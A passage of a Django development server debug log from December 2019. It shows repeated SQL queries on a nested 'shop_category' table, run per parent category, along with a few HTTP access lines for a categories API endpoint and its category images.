"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:05:09,617 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:05:09,625 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:05:09,627 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:05:09,631 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:05:09,633 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:05:09,636 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:05:09,638 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:05:09,641 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:05:09,644 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:05:09,647 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:05:09,649 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:05:09,652 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:05:09,654 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:05:09,658 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:05:09,660 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:05:09,663 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:05:09,665 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:05:09,668 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:05:09,672 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:05:09,674 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:05:09,677 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:05:09,679 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:05:09,681 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:05:09,684 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:05:09,688 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:05:09,691 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:05:09,694 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:05:09,697 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:05:09,701 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:05:09,706 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:05:09,709 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:05:09,712 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:05:09,715 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:05:09,717 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:05:09,721 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:05:09,723 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:05:09,725 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:05:09,728 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:05:09,730 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:05:09,732 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:05:09,737 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:05:09,740 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:05:09,743 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:05:09,746 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:05:09,748 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:05:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:05:10] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:10] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:10] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:10] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:10] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:10] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:05:36,299 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:05:36,306 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:05:36,310 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:05:36,313 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:05:36,319 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:05:36,322 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:05:36,325 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:05:36,329 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:05:36,333 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:05:36,339 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:05:36,343 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:05:36,347 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:05:36,351 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:05:36,355 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:05:36,362 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:05:36,371 utils 20136 140506667599616 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:05:36,375 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:05:36,379 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:05:36,383 utils 20136 140506652825344 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:05:36,383 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:05:36,395 utils 20136 140506652825344 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 